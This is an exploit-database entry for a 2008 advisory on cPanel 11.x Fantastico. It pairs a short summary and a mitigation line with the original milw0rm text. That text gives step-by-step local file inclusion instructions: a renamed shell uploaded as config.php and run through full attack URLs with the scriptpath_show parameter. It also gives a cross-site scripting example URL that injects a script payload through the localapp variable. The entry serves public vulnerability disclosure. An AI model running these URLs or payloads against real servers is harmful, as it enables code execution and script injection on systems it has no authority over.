Cpanel 11.x

vendor:

Cpanel

by:

Khashayar Fereidani

7.5

CVSS

HIGH

Local File Inclusion & Cross Site Scripting

94, 79

CWE

Product Name: Cpanel

Affected Version From: 11.x

Affected Version To: 11.x

Patch Exists: N/A

Related CWE: N/A

CPE: a:cpanel:cpanel

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Local File Inclusion vulnerability can be exploited by renaming a shell to config.php and uploading it to the ./ directory. Cross Site Scripting can be exploited by setting the action parameter to Upgrade%20to%201.7.4 and exploiting the vulnerable variables such as $localapp, $updatedir, $scriptpath_show, $domain_show, $thispage, $thisapp, and $currentversion.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

----------------------------------------------------------------

Script : Cpanel 11.x

Type : Local File Inclusion & Cross Site Scripting

Risk : High

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

**** I am 17 Years Old ****

My Official Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Local File Inclusion Vulnerability :

Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and
       enter vulnerable address in url ....


https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/

----------------------------------------------------------------

Cross site scripting :

File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4

Set Action as Upgrade%20to%201.7.4

Vulnerable Variables :

$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E


----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

# milw0rm.com [2008-10-31]